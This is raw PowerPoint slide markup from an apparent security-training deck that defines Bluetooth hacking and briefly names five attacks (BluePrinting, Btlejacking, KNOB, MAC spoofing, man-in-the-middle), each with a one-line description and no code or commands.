            <a:lvl1pPr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339725" marR="0" lvl="0" indent="-339725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Bluetooth hacking refers to the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exploitation of Bluetooth stack implementation vulnerabilities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to compromise sensitive data in Bluetooth-enabled devices and networks</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ar-JO" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof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B59368D2-8398-4EC5-8301-FFEF6B86963B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895543" y="1933575"/>
            <a:ext cx="2400914" cy="40011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Bluetooth Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7869231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ectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65F27F1F-0DBE-4189-89F4-5D265D3C083A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4992394" y="1838326"/>
            <a:ext cx="2199075" cy="1039848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A5A5A5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marL="0" marR="0" lvl="0" indent="0" defTabSz="91421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6" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9F60CD5-4A0C-481A-BFE8-22FF16B2F861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4992394" y="5724522"/>
            <a:ext cx="2199075" cy="444580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A5A5A5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marL="0" marR="0" lvl="0" indent="0" defTabSz="91421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1" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="171542" y="2868648"/>
            <a:ext cx="2199075" cy="2855877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85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defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="700">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA4A7CA7-AA69-4EAA-BE2A-7B1064C05E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="171542" y="1838326"/>
            <a:ext cx="2199075" cy="1039848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1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defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="70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3" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68B6F74A-9ACA-404A-921C-927F19406F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2581969" y="2868648"/>
            <a:ext cx="2199075" cy="2855877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85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defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="700">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8570482C-0231-4688-9A90-0E5B9ACA74C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4992396" y="2868648"/>
            <a:ext cx="2199075" cy="2855877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85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defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="700">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30706F3A-1773-4207-AC76-87C8A54ECA5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7402822" y="2868648"/>
            <a:ext cx="2199075" cy="2855877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85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defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="700">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDEF0BF-2DCB-4DE0-8475-DCE4752A80FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9813248" y="2868648"/>
            <a:ext cx="2199075" cy="2855877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85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defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="700">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{504572B3-F467-4424-8DDC-617D584DEEB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="171541" y="5724522"/>
            <a:ext cx="2199075" cy="444580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1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defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="70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0" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FD874E0-E813-499E-B0C0-CCEA0739CAA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2581968" y="1838326"/>
            <a:ext cx="2199075" cy="1039848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2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defTabSz="914217"/>
            <a:endParaRPr lang="en-US" sz="70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1" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CCF7D01-39A8-4D56-BB74-25287D8A836C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2581968" y="5724522"/>
            <a:ext cx="2199075" cy="444580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2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defTabSz="914217"/>
            <a:endParaRPr lang="en-US" sz="70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4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D15B2F4-DC67-4F74-AE99-62CF62E140BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7402820" y="1838326"/>
            <a:ext cx="2199075" cy="1039848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2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defTabSz="914217"/>
            <a:endParaRPr lang="en-US" sz="70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5" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6EE84C7-6D8D-408A-9598-496E7C83C84F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7402820" y="5724522"/>
            <a:ext cx="2199075" cy="444580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2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defTabSz="914217"/>
            <a:endParaRPr lang="en-US" sz="70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6" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B118C14-3FAA-4F0B-859F-648374DBC955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9811859" y="5724522"/>
            <a:ext cx="2199075" cy="444580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1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defTabSz="914217"/>
            <a:endParaRPr lang="en-US" sz="70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7" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2804C17C-8F51-4A11-88CB-CC20A647DA48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9811859" y="1838326"/>
            <a:ext cx="2199075" cy="1039848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1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defTabSz="914217"/>
            <a:endParaRPr lang="en-US" sz="70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2F21E659-535F-46BA-B35B-8DF21F2C15AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369453" y="2181279"/>
            <a:ext cx="1803252" cy="353943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln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BluePrinting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C1EE3996-074E-49D8-B9E6-04919334099A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2781960" y="2181279"/>
            <a:ext cx="1799091" cy="353943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln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Btlejacking</a:t>
            </a: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E856A132-3725-4C28-A3EF-30FE79E7B29B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5091503" y="2181279"/>
            <a:ext cx="2000857" cy="353943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln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KNOB Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10556DDD-F00F-4282-A93E-740987C439BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="7463383" y="2050474"/>
            <a:ext cx="2077948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MAC Spoofing Attack</a:t>
            </a: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B1151C04-0D90-4239-AB3D-9BC35E3112DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9730204" y="1919669"/>
            <a:ext cx="2363788" cy="877163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln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Man-in-the-Middle /Impersonation Attack</a:t>
            </a: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469C9534-0AA3-4ACB-879A-F4F0C1FF161D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228350" y="2949684"/>
            <a:ext cx="2135770" cy="203132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1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art of collecting information about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Bluetooth-enabled devices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such as manufacturer, device model, and firmware version</a:t>
            </a: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78A93A66-84C8-48D3-9037-D8125BD68CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2626933" y="2949684"/>
            <a:ext cx="2079868" cy="203132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1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Detrimental to BLE devices, it is used to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bypass security mechanisms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and listen to information being shared</a:t>
            </a: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D0A0255F-05D5-434B-B5D4-6762CA53010C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039187" y="2949684"/>
            <a:ext cx="2152281" cy="1923604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1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Exploiting a vulnerability in Bluetooth to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eavesdrop all the data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being shared, such as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keystrokes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chats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and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documents</a:t>
            </a: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0CB74306-99C0-44C2-BE0E-2095AD35940B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7466191" y="2949684"/>
            <a:ext cx="2124449" cy="1200329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1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Intercepting data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intended for other Bluetooth-enabled devices</a:t>
            </a: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E46715FC-A8F5-488E-940E-056078A68098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9875393" y="2949684"/>
            <a:ext cx="2131095" cy="147732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1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Modifying data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between Bluetooth-enabled devices communicating in a Piconet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Freeform 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16AD5D7A-D81F-44FA-8474-CEB8F46E4A5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63848" y="5212590"/>
            <a:ext cx="414462" cy="417778"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T18" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T19" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T20" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T24" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T26" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T27" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T28" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T29" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T30" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T31" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T32" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T33" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T34" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T35" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T36" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T37" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T38" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T39" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T40" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T41" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T42" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T43" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T44" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T45" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T46" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T47" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T48" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T49" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T50" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T51" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T52" fmla="*/ 0 w 58"/>
              <a:gd name="T53" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T54" fmla="*/ 0 w 58"/>
              <a:gd name="T55" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T56" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T57" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T58" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T59" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T60" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T61" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T62" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T63" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T64" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T65" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T66" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T67" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T68" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T69" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T70" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T71" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T72" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T73" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T74" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T75" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T76" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T77" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T78" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T79" fmla="*/ 0 h 58"/>
              <a:gd name="T80" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T81" fmla="*/ 0 h 58"/>
              <a:gd name="T82" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T83" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T84" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T85" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T86" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T87" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T88" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T89" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T90" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T91" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T92" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T93" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T94" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T95" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T96" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T97" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T98" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T99" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T100" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T101" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T102" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T103" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T104" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T105" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T106" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T107" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T108" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T109" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T110" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T111" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T112" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T113" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T114" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T115" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T116" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T117" fmla="*/ 2147483646 h 58"/>
              <a:gd name="T118" fmla="*/ 2147483646 w 58"/>
              <a:gd name="T119" fmla="*/ 2147483646 h 5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8" h="58">
                <a:moveTo>
                  <a:pt x="58" y="33"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="34"/>
                  <a:pt x="58" y="34"/>
                  <a:pt x="57" y="34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7"/>
                  <a:pt x="49" y="38"/>
                  <a:pt x="49" y="39"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="41"/>
                  <a:pt x="51" y="42"/>
                  <a:pt x="53" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="44"/>
                  <a:pt x="53" y="45"/>
                  <a:pt x="53" y="45"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="45"/>
                  <a:pt x="53" y="46"/>
                  <a:pt x="53" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="47"/>
                  <a:pt x="47" y="53"/>
                  <a:pt x="45" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="53"/>
                  <a:pt x="45" y="53"/>
                  <a:pt x="44" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="48"/>
                  <a:pt x="39" y="48"/>
                  <a:pt x="39" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="49"/>
                  <a:pt x="37" y="49"/>
                  <a:pt x="36" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="52"/>
                  <a:pt x="35" y="55"/>
                  <a:pt x="34" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="57"/>
                  <a:pt x="34" y="58"/>
                  <a:pt x="33" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="58"/>
                  <a:pt x="25" y="58"/>
                  <a:pt x="25" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="58"/>
                  <a:pt x="23" y="57"/>
                  <a:pt x="23" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="50"/>
                  <a:pt x="22" y="50"/>
                  <a:pt x="22" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="49"/>
                  <a:pt x="20" y="49"/>
                  <a:pt x="19" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
